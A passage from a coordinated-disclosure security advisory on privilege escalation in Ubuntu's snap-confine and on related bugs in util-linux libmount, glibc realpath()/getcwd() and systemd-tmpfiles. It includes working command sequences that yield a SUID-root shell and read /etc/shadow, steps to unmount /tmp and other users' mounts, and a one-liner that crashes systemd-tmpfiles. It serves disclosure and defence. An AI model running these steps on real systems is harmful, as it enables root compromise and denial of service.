/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0 This bind-mount is allowed by the line 762 of the "snap-update-ns.snap-store" AppArmor profile, and allows us to change the ownership of /var/lib/snapd back to root, and to execute a SUID-root program inside snap-store's mount namespace (and hence our own shared library, as root): ------------------------------------------------------------------------ $ echo '/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0' >> /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab $ mv -i /tmp/.tmp/.snap/var/lib /tmp/.tmp/.snap/var/lib.exchange2 $ mv -i /tmp/.tmp/.snap/var/lib.exchange /tmp/.tmp/.snap/var/lib $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine ... change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: ) change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: ) ... DEBUG: loading bpf program for security tag snap.snap-store.snap-store DEBUG: read 6392 bytes from /var/lib/snapd/seccomp/bpf//snap.snap-store.snap-store.bin ... DEBUG: execv(/usr/lib/snapd/snap-confine, /usr/lib/snapd/snap-confine...) ... ------------------------------------------------------------------------ This second attempt succeeded; our shared library created a SUID-root shell /tmp/sh that is reachable outside snap-store's mount namespace via /tmp/.tmp/sh: ------------------------------------------------------------------------ $ /tmp/.tmp/sh -p # id uid=1001(jane) gid=1001(jane) euid=0(root) groups=1001(jane) ^^^^^^^^^^^^ # wc /etc/shadow 49 49 1617 /etc/shadow ------------------------------------------------------------------------ ======================================================================== Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount ======================================================================== Get a little extra help -- Oh No! More Lemmings, Tame Level 14 During our work on snap-confine, we explored many different avenues of attack; most of them were dead ends, but some of them led us to the discovery of vulnerabilities in related packages and libraries. For example, we pondered over the beginning of snap-confine's function sc_bootstrap_mount_namespace() for a long time: ------------------------------------------------------------------------ 223 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX"; ... 226 if (mkdtemp(scratch_dir) == NULL) { ... 234 sc_do_mount("none", "/", NULL, MS_REC | MS_SHARED, NULL); ... 238 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL); ... 245 sc_do_mount("none", scratch_dir, NULL, MS_UNBINDABLE, NULL); ... 254 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND, 255 NULL); ------------------------------------------------------------------------ This function is called after unshare(CLONE_NEWNS) to set up the root filesystem inside a snap's mount namespace: - at lines 223-226, it creates a random, temporary scratch directory /tmp/snap.rootfs_XXXXXX (as root, with permissions 0700) that will become the snap's root filesystem; - at lines 238-245, it bind-mounts this scratch directory onto itself, and makes it unbindable and private (i.e., subsequent mounts inside this directory will not be visible outside the snap's mount namespace); - at lines 254-255, it bind-mounts the snap's root filesystem onto this scratch directory (for example, /snap/snapd/current, a read-only squashfs that contains a copy of the SUID-root snap-confine). Our half-baked idea was: what if we were able to unmount the scratch directory's private bind-mount, after line 245 but before line 254? The bind-mount of the snap's root filesystem (at lines 254-255) would not be private anymore, and would therefore be visible outside the snap's mount namespace. In other words, we would be able to execute snap-confine via /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, which reminded us strongly of our exploit for CVE-2021-44730 (but without a hardlink). Consequently, we audited the SUID-root programs umount and fusermount for ways to unmount a filesystem that does not belong to us, and we discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount (which is used internally by umount). Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit 5fea669 ("libmount: Support unmount FUSE mounts") in November 2018. ======================================================================== CVE-2021-3996: Unauthorized unmount in util-linux's libmount ======================================================================== In order for an unprivileged user to unmount a FUSE filesystem with umount, this filesystem must a/ be listed in /proc/self/mountinfo, and b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current, unprivileged user (lines 477-498): ------------------------------------------------------------------------ 451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv) 452 { ... 466 if (strcmp(type, "fuse") != 0 && 467 strcmp(type, "fuseblk") != 0 && 468 strncmp(type, "fuse.", 5) != 0 && 469 strncmp(type, "fuseblk.", 8) != 0) 470 return 0; ... 477 if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0) 478 return 0; ... 490 uid = getuid(); ... 497 snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid); 498 return strncmp(user_id, uidstr, sz) == 0; 499 } ------------------------------------------------------------------------ Unfortunately, when parsing /proc/self/mountinfo, the libmount blindly removes any " (deleted)" suffix from the mountpoint pathnames (at lines 231-233): ------------------------------------------------------------------------ 17 #define PATH_DELETED_SUFFIX " (deleted)" ------------------------------------------------------------------------ 179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s) 180 { ... 223 /* (5) target */ 224 fs->target = unmangle(s, &s); ... 231 p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX); 232 if (p && *p) 233 *p = '\0'; ------------------------------------------------------------------------ This vulnerability allows an unprivileged user to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory (like /tmp/snap.rootfs_XXXXXX). For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program, ./hello) and unmount /tmp itself (a denial of service): ------------------------------------------------------------------------ $ id uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 $ grep /tmp /proc/self/mountinfo 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64 $ mkdir -m 0700 /tmp/" (deleted)" $ ./hello /tmp/" (deleted)" $ grep /tmp /proc/self/mountinfo 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64 620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000 $ mount | grep /tmp tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64) /home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000) $ umount -l /tmp/ $ grep /tmp /proc/self/mountinfo | wc 0 0 0 ------------------------------------------------------------------------ ======================================================================== CVE-2021-3995: Unauthorized unmount in util-linux's libmount ======================================================================== Alert readers may have spotted another vulnerability in is_fuse_usermount(): at line 498, only the first "sz" characters of the current user's uid are compared to the filesystem's "user_id" option (sz is user_id's length). This second vulnerability allows an unprivileged user to unmount the FUSE filesystems that belong to certain other users; for example, if our own uid is 1000, then we can unmount the FUSE filesystems of the users whose uid is 100, 10, or 1: ------------------------------------------------------------------------ $ id uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 $ grep fuse /proc/self/mountinfo 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw 620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1 $ umount -l /mnt/bin $ grep fuse /proc/self/mountinfo 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw ------------------------------------------------------------------------ ======================================================================== Epilogue: snap-confine and CVE-2021-3996 in util-linux's libmount ======================================================================== CVE-2021-3996 in libmount allows us to unmount the private bind-mount of snap-confine's scratch directory, between the lines 245 and 254 (we can reliably win this race condition by "single-stepping" snap-confine with SNAPD_DEBUG=1), which allows us to execute the bind-mounted program /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine. Nonetheless, we were unable to reproduce our exploit for CVE-2021-44730 or CVE-2021-44731: - if we execute snap-confine outside the snap's mount namespace, via /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, then we are unable to provide our own snap-discard-ns program because the directory /tmp/snap.rootfs_XXXXXX already exists and we cannot remove it; - if we execute snap-confine inside the snap's mount namespace, via /var/lib/snapd/hostfs/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, then snap-confine enters init's mount namespace (outside the snap's mount namespace) and we are unable to provide our own snap-discard-ns program because the directory /var/lib/snapd/hostfs/tmp does not exist and we cannot create it. If you, dear reader, find a solution to these problems, please post it to the public oss-security mailing list! Note: CVE-2021-3996 might be exploitable in contexts other than snap-confine, but we have not explored this possibility. ======================================================================== CVE-2021-3998: Unexpected return value from glibc's realpath() ======================================================================== Triple Trouble -- Lemmings, Taxing Level 26 While auditing umount and fusermount, we also discovered a vulnerability in the glibc's realpath() function, which is used internally by various programs. Normally, when the output buffer "resolved" that is passed to realpath() is not NULL, then realpath() either returns NULL on failure, or it returns the output buffer "resolved" on success. Unfortunately, since commit c6e0b0b ("stdlib: Sync canonicalize with gnulib") from January 2021, realpath() can mistakenly return a malloc()ated buffer that is neither NULL nor the output buffer "resolved": ------------------------------------------------------------------------ 430 char * 431 __realpath (const char *name, char *resolved) 432 { ... 437 struct scratch_buffer rname_buffer; 438 return realpath_stk (name, resolved, &rname_buffer); 439 } ------------------------------------------------------------------------ 197 static char * 198 realpath_stk (const char *name, char *resolved, 199 struct scratch_buffer *rname_buf) 200 { ... 399 failed = false; ... 403 if (resolved != NULL && dest - rname <= get_path_max ()) 404 rname = strcpy (resolved, rname); ... 410 if (failed || rname == resolved) 411 { 412 scratch_buffer_free (rname_buf); 413 return failed ? NULL : resolved; 414 } 415 416 return scratch_buffer_dupfree (rname_buf, dest - rname); 417 } ------------------------------------------------------------------------ For example, if the input path "name" is "." and if the current working directory is longer than PATH_MAX, then: - at line 399, "failed" is set to false; - at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is left untouched and uninitialized (because "dest - rname" is longer than PATH_MAX); - the code block at lines 410-414 is skipped (because "failed" is false and "rname" is not "resolved"); - at line 416, scratch_buffer_dupfree() returns a malloc()ated buffer that is NOT the output buffer "resolved". The consequences of this vulnerability depend on the affected programs; for example, fusermount (a SUID-root program) can disclose sensitive information (pointers) when displaying the contents of a stack-based buffer that is mistakenly left uninitialized by realpath() (we tested this proof of concept on Ubuntu 21.04): ------------------------------------------------------------------------ $ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c $ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output ... $ hexdump -C CVE-2021-3998-fusermount.output 00000000 2f 75 73 72 2f 62 69 6e 2f 66 75 73 65 72 6d 6f |/usr/bin/fusermo| 00000010 75 6e 74 3a 20 65 6e 74 72 79 20 66 6f 72 20 f0 |unt: entry for .| 00000020 83 9b 99 ff 7f 20 6e 6f 74 20 66 6f 75 6e 64 20 |..... not found | 00000030 69 6e 20 2f 65 74 63 2f 6d 74 61 62 0a 0a 2f 75 |in /etc/mtab../u| 00000040 73 72 2f 62 69 6e 2f 66 75 73 65 72 6d 6f 75 6e |sr/bin/fusermoun| 00000050 74 3a 20 65 6e 74 72 79 20 66 6f 72 20 39 ac b7 |t: entry for 9..| 00000060 a5 a2 7f 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e |... not found in| 00000070 20 2f 65 74 63 2f 6d 74 61 62 0a 0a | /etc/mtab..| ------------------------------------------------------------------------ ======================================================================== CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd() ======================================================================== Down, along, up. In that order -- Lemmings, Mayhem Level 5 While studying the vulnerability in realpath(), we also discovered a vulnerability in the glibc's getcwd() function (which is used internally by realpath() to resolve relative pathnames) -- an off-by-one buffer overflow and underflow, but if and only if the "size" of "buf" is exactly 1: ------------------------------------------------------------------------ 48 __getcwd (char *buf, size_t size) 49 { .. 54 size_t alloc_size = size; .. 76 path = buf; .. 80 retval = INLINE_SYSCALL (getcwd, 2, path, alloc_size); ... 100 if (retval >= 0 || errno == ENAMETOOLONG) 101 { ... 110 result = __getcwd_generic (path, size); ------------------------------------------------------------------------ 158 __getcwd_generic (char *buf, size_t size) 159 { ... 187 size_t allocated = size; ... 247 dir = buf; 248 249 dirp = dir + allocated; 250 *--dirp = '\0'; ... 262 while (!(thisdev == rootdev && thisino == rootino)) 263 { ... 441 } ... 449 if (dirp == &dir[allocated - 1]) 450 *--dirp = '/'; ... 457 used = dir + allocated - dirp; 458 memmove (dir, dirp, used); ------------------------------------------------------------------------ If, at line 48, the "size" of "buf" is exactly 1: - and if, at line 80, the kernel's getcwd() syscall fails with the error ENAMETOOLONG (because the current working directory is longer than PATH_MAX), - then, at line 110, a generic implementation of getcwd() is called; - at line 250, a null byte is written to "dirp", which points exactly to "buf" (because "size", and hence "allocated", are exactly 1); - if the code block at lines 262-441 is skipped entirely (if the current working directory corresponds to the "/" directory), - then, at lines 449-450, a slash is written to "buf-1" (an off-by-one buffer underflow, because at line 449 "dirp" was still pointing exactly to "buf"), - and, at lines 457-458, a null byte is written to "buf+1" (an off-by-one buffer overflow, because at line 457 "used" is exactly 2). It may seem impossible to satisfy the condition at line 100 (the current working directory is longer than PATH_MAX) and the condition at line 262 (the current working directory corresponds to the "/" directory), but in reality we can: - in a child process: - create an unprivileged mount namespace; - create a directory longer than PATH_MAX; - bind-mount "/" onto this directory; - open() this directory and send its file descriptor to the parent process (outside the unprivileged mount namespace); - in the parent process: - receive the file descriptor of this directory (which corresponds to "/" and is longer than PATH_MAX) and fchdir() to it; - execute a SUID program that calls getcwd() with a buffer of size 1, which triggers the off-by-one buffer overflow and underflow. Apparently, this vulnerability was introduced in February 1995 by the very first commit in the glibc's git history (28f540f, "initial import") and could be triggered without an unprivileged mount namespace, by simply chdir()ing to the "/" directory: ------------------------------------------------------------------------ 190 getcwd (buf, size) ... 218 path = buf; ... 226 pathp = path + size; 227 *--pathp = '\0'; ... 242 while (!(thisdev == rootdev && thisino == rootino)) 243 { ... 351 } 352 353 if (pathp == &path[size - 1]) 354 *--pathp = '/'; ... 359 memmove (path, pathp, path + size - pathp); ------------------------------------------------------------------------ Although "the size of buf is exactly 1" is a strong requirement, vulnerable code like the following may exist in the wild: ------------------------------------------------------------------------ #include #include int main(int argc, char * argv[]) { char buf[4096]; int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv[0]); if (len <= 0 || (unsigned)len >= sizeof(buf)) return __LINE__; if (!getcwd(buf + len, sizeof(buf) - len)) return __LINE__; puts(buf); return 0; } ------------------------------------------------------------------------ ======================================================================== CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles ======================================================================== The Stack -- Oh No! More Lemmings, Crazy Level 6 While trying to exploit snap-confine via CVE-2021-3996, we explored alternative ways to remove the scratch directory /tmp/snap.rootfs_XXXXXX (a sufficient, and maybe necessary, condition for a successful exploit). We therefore looked into systemd-tmpfiles (which "creates, deletes, and cleans up volatile and temporary files and directories") and discovered a denial of service (an uncontrolled recursion): if we create thousands of nested directories in /tmp, then "systemd-tmpfiles --remove" (when executed as root at boot time) will call its rm_rf_children() function recursively (on each nested directory) and will exhaust its stack and crash. For example, on Ubuntu 21.04: ------------------------------------------------------------------------ $ cd /tmp $ perl -e 'use strict; for (my $i = 0; $i < (1<<15); $i++) { mkdir "A", 0700 or die; chdir "A" or die; }' ------------------------------------------------------------------------ Then, as root (warning: this command may delete important files and directories in /tmp; it is normally executed at boot time only): ------------------------------------------------------------------------ # systemd-tmpfiles --remove Segmentation fault (core dumped) ------------------------------------------------------------------------ We have not fully explored the implications of this vulnerability; however, we noticed that: - at boot time, systemd executes "systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev"; - systemd-tmpfiles first enters the "remove" phase, and subsequently enters the "create" phase; - but if systemd-tmpfiles crashes during the "remove" phase, then it never enters the "create" phase; - and it fails to create the files and directories (specified in /usr/lib/tmpfiles.d/*.conf) that it should create at boot time; - for example, on Ubuntu 21.04, systemd-tmpfiles fails to create the directory /run/lock/subsys; but because /run/lock is world-writable, attackers can create their own /run/lock/subsys; and because various legacy packages and daemons write into /run/lock/subsys as root, the attackers may create arbitrary files via symlinks in /run/lock/subsys. Last-minute note: it seems impossible to trigger this vulnerability in systemd-tmpfiles versions before commit e535840 ("tmpfiles: let's bump RLIMIT_NOFILE for tmpfiles") from February 2019. ======================================================================== Acknowledgments ======================================================================== We thank the Ubuntu Security Team (Alex Murray and Seth Arnold in particular) for their hard work on the snap-confine vulnerabilities. We also thank Red Hat Product Security, Zbigniew Jedrzejewski-Szmek, Karel Zak, Siddhesh Poyarekar, and the members of linux-distros@openwall for their work on the systemd, util-linux, and glibc vulnerabilities. This advisory is dedicated to 8lgm -- followers of symbolic links, overflowers of stack buffers, and dereferencers of NULL pointers: https://attrition.org/security/advisory/8lgm/ https://web.archive.org/web/20081203221844/packetstorm.linuxsecurity.com/poisonpen/8lgm/ptchown.c ======================================================================== Timeline ======================================================================== 2021-10-27: We sent our advisory and proofs-of-concepts to security@ubuntu. 2021-11-10: We sent our advisory and proofs-of-concepts (without the snap-confine vulnerabilities) to secalert@redhat. 2021-12-29: We sent a write-up and the patch for the systemd vulnerability to linux-distros@openwall. 2022-01-10: We published our write-up on the systemd vulnerability (https://www.openwall.com/lists/oss-security/2022/01/10/2). 2022-01-12: Red Hat filed the glibc vulnerabilities upstream (https://sourceware.org/bugzilla/show_bug.cgi?id=28769 and https://sourceware.org/bugzilla/show_bug.cgi?id=28770). 2022-01-20: We sent a write-up and the patches for the util-linux vulnerabilities to linux-distros@openwall. 2022-01-24: We published our write-up on the util-linux vulnerabilities (https://www.openwall.com/lists/oss-security/2022/01/24/2). 2022-01-24: We published our write-up on the glibc vulnerabilities (https://www.openwall.com/lists/oss-security/2022/01/24/4). 2022-02-03: We sent our advisory and Ubuntu sent their patches for the snap-confine vulnerabilities to linux-distros@openwall. 2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine vulnerabilities.